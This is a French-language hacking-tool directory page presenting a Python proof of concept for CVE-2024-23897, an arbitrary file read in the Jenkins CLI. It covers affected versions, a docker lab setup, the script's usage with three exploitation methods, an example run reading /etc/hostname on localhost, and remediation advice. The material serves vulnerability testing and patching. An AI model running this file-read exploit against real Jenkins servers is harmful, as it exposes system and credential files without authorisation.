Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Jenkins-CVE-2024-23897 — PoC Python pour CVE-2024-23897 lecture de fichier arbitraire Jenkins via la CLI, exposant la divulgation de fichiers non authentifiée avec plusieurs méthodes d'exploitation. | Kitploit
Outils/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

PoC Python pour CVE-2024-23897 lecture de fichier arbitraire Jenkins via la CLI, exposant la divulgation de fichiers non authentifiée avec plusieurs méthodes d'exploitation.

Voir le dépôtSite web
111il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Jenkins CVE-2024-23897 – Preuve de concept

Une preuve de concept (PoC) pour CVE-2024-23897, une vulnérabilité de lecture arbitraire de fichiers dans l'interface en ligne de commande (CLI) intégrée de Jenkins. Elle permet à des attaquants non authentifiés disposant de l'autorisation Overall/Read de lire des fichiers arbitraires sur le système de fichiers du contrôleur Jenkins.

Versions affectées

  • Jenkins versions <= 2.441
  • Jenkins LTS versions <= 2.426.2

Configurer une instance vulnérable

Lancez une instance vulnérable locale avec docker compose :

root@kitploit:~
cd docker
docker compose up -d

L'instance sera accessible à l'adresse http://localhost:1234

Exploitation

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)

Exemple

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

Le script peut rencontrer des problèmes pour lire des fichiers volumineux en raison de la concurrence et des délais d'attente de connexion. Pour plus de détails techniques et une analyse de la vulnérabilité, consultez mon article de blog sur le sujet.

Correction

  • Mettez à jour vers Jenkins 2.442 ou LTS 2.426.3
  • Appliquez des contournements temporaires comme décrit dans l'avis de sécurité Jenkins.

Liens connexes

  • Sonar Source | Expansion excessive : Découverte de vulnérabilités de sécurité critiques dans Jenkins
  • Avis de sécurité Jenkins - 2024-01-24
  • Qualys ThreatPROTECT | Vulnérabilité d'exécution de code à distance dans Jenkins Core (CVE-2024-23897)
  • CVE-2024-23897 : Évaluation de l'impact de la vulnérabilité de fuite de fichiers arbitraires Jenkins – Horizon3.ai
Télécharger l’outil